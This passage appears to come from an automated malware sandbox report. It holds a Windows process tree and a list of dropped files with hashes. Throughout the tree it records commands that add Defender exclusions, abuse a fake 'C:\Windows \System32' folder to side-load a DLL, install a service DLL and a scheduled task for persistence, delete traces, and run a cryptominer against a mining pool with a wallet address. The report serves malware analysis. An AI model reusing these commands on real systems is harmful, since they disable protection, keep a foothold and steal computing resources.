                                                                                            cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'H:\'
                                                                                            2⤵
                                                                                              PID:736
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'H:\'
                                                                                                3⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:5296
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              cmd.exe /c start "" "c:\windows\system32\winsvcf\x862456.exe"
                                                                                              2⤵
                                                                                                PID:5300
                                                                                                • \??\c:\windows\system32\winsvcf\x862456.exe
                                                                                                  "c:\windows\system32\winsvcf\x862456.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5504
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                                    4⤵
                                                                                                      PID:1148
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                                        5⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:6120
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                                                                                                      4⤵
                                                                                                        PID:5640
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                                                                                                          5⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:2840
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        cmd.exe /c timeout /t 5 /nobreak && move "c:\windows\system32\winsvcf\x862456.exe" "C:\Windows\System32" && start "" "C:\Windows\System32\x862456.exe"
                                                                                                        4⤵
                                                                                                          PID:5344
                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                            timeout /t 5 /nobreak
                                                                                                            5⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:5288
                                                                                                          • C:\Windows\System32\x862456.exe
                                                                                                            "C:\Windows\System32\x862456.exe"
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Drops file in System32 directory
                                                                                                            PID:3016
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                                              6⤵
                                                                                                                PID:5788
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                                                  7⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:5320
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                                                                                                                6⤵
                                                                                                                  PID:4392
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                                                                                                                    7⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    PID:6104
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  cmd.exe /c sc stop x670435
                                                                                                                  6⤵
                                                                                                                    PID:5616
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      sc stop x670435
                                                                                                                      7⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:3304
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    cmd.exe /c sc delete x670435
                                                                                                                    6⤵
                                                                                                                      PID:5452
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc delete x670435
                                                                                                                        7⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:6048
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      cmd.exe /c rmdir /s /q "C:\Windows \"
                                                                                                                      6⤵
                                                                                                                        PID:1596
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        cmd.exe /c mkdir "\\?\C:\Windows \System32"
                                                                                                                        6⤵
                                                                                                                          PID:2660
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          cmd.exe /c start "" "C:\Windows \System32\printui.exe"
                                                                                                                          6⤵
                                                                                                                            PID:5312
                                                                                                                            • C:\Windows \System32\printui.exe
                                                                                                                              "C:\Windows \System32\printui.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Drops file in System32 directory
                                                                                                                              PID:412
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
                                                                                                                                8⤵
                                                                                                                                  PID:5800
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
                                                                                                                                    9⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    PID:2920
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  cmd.exe /c sc create x707650 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x707650\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x707650.dat" /f && sc start x707650
                                                                                                                                  8⤵
                                                                                                                                    PID:1940
                                                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                                                      sc create x707650 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
                                                                                                                                      9⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:5724
                                                                                                                                    • C:\Windows\System32\reg.exe
                                                                                                                                      reg add HKLM\SYSTEM\CurrentControlSet\services\x707650\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x707650.dat" /f
                                                                                                                                      9⤵
                                                                                                                                      • Server Software Component: Terminal Services DLL
                                                                                                                                      • Modifies registry key
                                                                                                                                      PID:5612
                                                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                                                      sc start x707650
                                                                                                                                      9⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:1304
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
                                                                                                                                    8⤵
                                                                                                                                      PID:4844
                                                                                                                                      • C:\Windows\System32\console_zero.exe
                                                                                                                                        "C:\Windows\System32\console_zero.exe"
                                                                                                                                        9⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:3292
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                                          10⤵
                                                                                                                                            PID:1068
                                                                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                                                                              schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                                              11⤵
                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                              PID:5724
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
                                                                                                                                        8⤵
                                                                                                                                          PID:6020
                                                                                                                                          • C:\Windows\System32\timeout.exe
                                                                                                                                            timeout /t 14 /nobreak
                                                                                                                                            9⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:2808
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows \System32\printui.dll"
                                                                                                                                          8⤵
                                                                                                                                            PID:2028
                                                                                                                                            • C:\Windows\System32\timeout.exe
                                                                                                                                              timeout /t 16 /nobreak
                                                                                                                                              9⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:1580
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Windows\System32\x862456.exe"
                                                                                                                                        6⤵
                                                                                                                                          PID:5552
                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                            timeout /t 10 /nobreak
                                                                                                                                            7⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:684
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  cmd.exe /c x449375.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x535080 --max-cpu-usage=50
                                                                                                                                  2⤵
                                                                                                                                    PID:1704
                                                                                                                                    • \??\c:\windows\system32\winsvcf\x449375.dat
                                                                                                                                      x449375.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x535080 --max-cpu-usage=50
                                                                                                                                      3⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                      PID:2952
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                                                                                                                                    2⤵
                                                                                                                                      PID:4500
                                                                                                                                      • \??\c:\windows\system32\crypti.exe
                                                                                                                                        "c:\windows\system32\crypti.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:4448
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      cmd.exe /c x449375.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x535080 --max-cpu-usage=50
                                                                                                                                      2⤵
                                                                                                                                        PID:6132
                                                                                                                                        • \??\c:\windows\system32\winsvcf\x449375.dat
                                                                                                                                          x449375.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x535080 --max-cpu-usage=50
                                                                                                                                          3⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                          PID:1576
                                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:4460
                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                          PID:1640
                                                                                                                                        • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                          "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:5780
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5768 -ip 5768
                                                                                                                                          1⤵
                                                                                                                                            PID:5032
                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                            C:\Windows\System32\svchost.exe -k DcomLaunch
                                                                                                                                            1⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            PID:4796
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                                                                              2⤵
                                                                                                                                                PID:3340
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                                                                                  3⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  PID:4892
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
                                                                                                                                                2⤵
                                                                                                                                                  PID:5764
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
                                                                                                                                                    3⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:5580
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'G:\'
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2840
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'G:\'
                                                                                                                                                      3⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:5504
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'H:\'
                                                                                                                                                    2⤵
                                                                                                                                                      PID:740
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'H:\'
                                                                                                                                                        3⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        PID:2936
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      cmd.exe /c x396526.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=rig_00 --max-cpu-usage=50
                                                                                                                                                      2⤵
                                                                                                                                                        PID:5328
                                                                                                                                                        • \??\c:\windows\system32\winsvcf\x396526.dat
                                                                                                                                                          x396526.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=rig_00 --max-cpu-usage=50
                                                                                                                                                          3⤵
                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                          PID:3296
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        cmd.exe /c x396526.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=rig_00 --max-cpu-usage=50
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4076
                                                                                                                                                          • \??\c:\windows\system32\winsvcf\x396526.dat
                                                                                                                                                            x396526.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=rig_00 --max-cpu-usage=50
                                                                                                                                                            3⤵
                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                            PID:1704
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1000
                                                                                                                                                            • \??\c:\windows\system32\crypti.exe
                                                                                                                                                              "c:\windows\system32\crypti.exe"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4988
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3336 -ip 3336
                                                                                                                                                            1⤵
                                                                                                                                                              PID:164

                                                                                                                                                            Network

                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                            Replay Monitor

                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                            Downloads

                                                                                                                                                            • C:\ProgramData\Remcos\logs.dat

                                                                                                                                                              Filesize

                                                                                                                                                              160B

                                                                                                                                                              MD5

                                                                                                                                                              c493da3ded3290c7f26644218ea621fb

                                                                                                                                                              SHA1

                                                                                                                                                              2b1295b78340670b3f02acbd3f83f1b6f8f59c97

                                                                                                                                                              SHA256

                                                                                                                                                              c041f6187596b7df7ccc0e8c6b66f995793ab301c4f1d7a541ba1b3be6d221bd

                                                                                                                                                              SHA512

                                                                                                                                                              ebf8fe326dad3d2db22766ec2b6e58b0f37b1e9503bc382330cdc4f628eea385791c4bc0b4658e0415c034fd5fd57146ebc11de0864d4eaec7e575f63421de21

                                                                                                                                                            • C:\ProgramData\mozglue.dll

                                                                                                                                                              Filesize

                                                                                                                                                              593KB

                                                                                                                                                              MD5

                                                                                                                                                              c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                              SHA1

                                                                                                                                                              95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                              SHA256

                                                                                                                                                              ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                              SHA512

                                                                                                                                                              fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                            • C:\Users\Admin\AppData\Local\GuardKey Solutions\HermesKey.scr

                                                                                                                                                              Filesize

                                                                                                                                                              872KB

                                                                                                                                                              MD5

                                                                                                                                                              18ce19b57f43ce0a5af149c96aecc685

                                                                                                                                                              SHA1

                                                                                                                                                              1bd5ca29fc35fc8ac346f23b155337c5b28bbc36

                                                                                                                                                              SHA256

                                                                                                                                                              d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd

                                                                                                                                                              SHA512

                                                                                                                                                              a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                              Filesize

                                                                                                                                                              2KB

                                                                                                                                                              MD5

                                                                                                                                                              d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                              SHA1

                                                                                                                                                              31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                              SHA256

                                                                                                                                                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                              SHA512

                                                                                                                                                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                              Filesize

                                                                                                                                                              152B

                                                                                                                                                              MD5

                                                                                                                                                              d22073dea53e79d9b824f27ac5e9813e

                                                                                                                                                              SHA1

                                                                                                                                                              6d8a7281241248431a1571e6ddc55798b01fa961

                                                                                                                                                              SHA256

                                                                                                                                                              86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6

                                                                                                                                                              SHA512

                                                                                                                                                              97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                              Filesize

                                                                                                                                                              152B

                                                                                                                                                              MD5

                                                                                                                                                              bffcefacce25cd03f3d5c9446ddb903d

                                                                                                                                                              SHA1

                                                                                                                                                              8923f84aa86db316d2f5c122fe3874bbe26f3bab

                                                                                                                                                              SHA256

                                                                                                                                                              23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405

                                                                                                                                                              SHA512

                                                                                                                                                              761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              eba7f3038f006bf687c22478fd80c3b9

                                                                                                                                                              SHA1

                                                                                                                                                              702b0911dbc5eff49c5e734051098a6423814347

                                                                                                                                                              SHA256

                                                                                                                                                              d8d8207a0d10f6e0129aaa9aca2762d0986ba1676e865393708f37ac4ed79d5f

                                                                                                                                                              SHA512

                                                                                                                                                              e41952ae6e9a062e30058763ac64a0e5df4953b911cada221288b88381d40b810e54e97fa0caeb67b228c9df2f88a83ea750e946f096b72f4f92ff350aa57801

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                              Filesize

                                                                                                                                                              5KB

                                                                                                                                                              MD5

                                                                                                                                                              0fb5fc6be53d44598c992c52d41d6c20

                                                                                                                                                              SHA1

                                                                                                                                                              a707200a55e752aa3d444a6b5faee009c402c40a

                                                                                                                                                              SHA256

                                                                                                                                                              304853960ab5c7d231a3b9d264b0fb94c955867f26e69dce69f0ca3be47a202e

                                                                                                                                                              SHA512

                                                                                                                                                              47c1a632f3f08e5ff845b4f6280ff9c056a094dceb0ebdeb7edd3b51061e3b54260656dd583fa2dd14203091466e65d680947141a2cc8d42c7378f154c3851d7

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                              Filesize

                                                                                                                                                              6KB

                                                                                                                                                              MD5

                                                                                                                                                              d40350ff63de56899b885e7a60ea51e2

                                                                                                                                                              SHA1

                                                                                                                                                              dcae59e683709f0f84f42d7c7965d86352900778

                                                                                                                                                              SHA256

                                                                                                                                                              937326ea245a0bb55c4d29bf40ea98cf9329da06c60edc4a6ad0e05352fef5a5

                                                                                                                                                              SHA512

                                                                                                                                                              8e2109ac1e4db4c8f5a83cb9190ca8d517ba5f8d8565c860df36c0fff4c3b84e9e55fc17ab92b2dfe1362555d704de62f7567f8cf8b8806873c64d367fb31d26

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                                                                              Filesize

                                                                                                                                                              96B

                                                                                                                                                              MD5

                                                                                                                                                              100faa29ab91b57f8fbc09625349c6c1

                                                                                                                                                              SHA1

                                                                                                                                                              2b184f9f0825e131632333d32ea37fb8dbe037c8

                                                                                                                                                              SHA256

                                                                                                                                                              b1aa200f182649341e8b3bbc8a6ff80be44296f8b07a95e1d92467becb72cf91

                                                                                                                                                              SHA512

                                                                                                                                                              818fb9369baea51caccfe8b5aa7eaab8612f3034fddf5b122138f144b4db0fd6d0e6e3a95a3ec98103c7d919b48df56db413e22015d6328abec164e6e1b5e76f

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe596373.TMP

                                                                                                                                                              Filesize

                                                                                                                                                              48B

                                                                                                                                                              MD5

                                                                                                                                                              793fee23da30dceaa18714bd7d425951

                                                                                                                                                              SHA1

                                                                                                                                                              c706d6045fa8a9bd62f9b9aa317606c9e160ed0b

                                                                                                                                                              SHA256

                                                                                                                                                              516b7d20d7a5c46a1fa7c0e07f902f0bef2576814debd65025c6214506eac3ed

                                                                                                                                                              SHA512

                                                                                                                                                              98b6fefca8c2a5221570dd7d4d64eafaa0b4fd01f715bca0e6f1e92b15fdaa25eff307ddf50d43ce93a88a801f8dcabaa4ba545f7d8c0e7cb006ae6f75171e49

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                              Filesize

                                                                                                                                                              16B

                                                                                                                                                              MD5

                                                                                                                                                              6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                              SHA1

                                                                                                                                                              58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                              SHA256

                                                                                                                                                              0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                              SHA512

                                                                                                                                                              9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                              Filesize

                                                                                                                                                              10KB

                                                                                                                                                              MD5

                                                                                                                                                              6b1720b1101911a283d813580ee2350a

                                                                                                                                                              SHA1

                                                                                                                                                              180bd6e83dfb6c8b330050c7ee3fe30e894a3d99

                                                                                                                                                              SHA256

                                                                                                                                                              af5286dfece029038017334ffc933a29832e597bcbce265562feabed6f1d4df2

                                                                                                                                                              SHA512

                                                                                                                                                              4f9d12498aa5af3b2704c05f7775d72404a622df87874f397534dff598252032eda2cd78c97292bcb7c16d704a3bfaffaf400afd4d6723b093a7036e33d4c16c

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                              Filesize

                                                                                                                                                              10KB

                                                                                                                                                              MD5

                                                                                                                                                              87391afb8b92d617020cabea3637377e

                                                                                                                                                              SHA1

                                                                                                                                                              351b7e5c58067146640a81eb4f90e14b4373e2db

                                                                                                                                                              SHA256

                                                                                                                                                              277f16407095f26fb9025369261f2e0c832028bb8ca1cec31863006ceea16118

                                                                                                                                                              SHA512

                                                                                                                                                              b40ea94a3030bb2f00d87944399a4052e4d31c8312e176cea448b1f0bf695f6d946c946f53a8c9633d5a432ef178b03ba1dce05ce74b4679feea8f21692aee56

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              944B

                                                                                                                                                              MD5

                                                                                                                                                              6d42b6da621e8df5674e26b799c8e2aa

                                                                                                                                                              SHA1

                                                                                                                                                              ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                                                                                                                              SHA256

                                                                                                                                                              5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                                                                                                                              SHA512

                                                                                                                                                              53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              944B

                                                                                                                                                              MD5

                                                                                                                                                              34f595487e6bfd1d11c7de88ee50356a

                                                                                                                                                              SHA1

                                                                                                                                                              4caad088c15766cc0fa1f42009260e9a02f953bb

                                                                                                                                                              SHA256

                                                                                                                                                              0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

                                                                                                                                                              SHA512

                                                                                                                                                              10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              944B

                                                                                                                                                              MD5

                                                                                                                                                              3671431dc9392fbccf1c030579b01ede

                                                                                                                                                              SHA1

                                                                                                                                                              dd49638304a4d3ce6fcfa7e7897005a78e7a2d84

                                                                                                                                                              SHA256

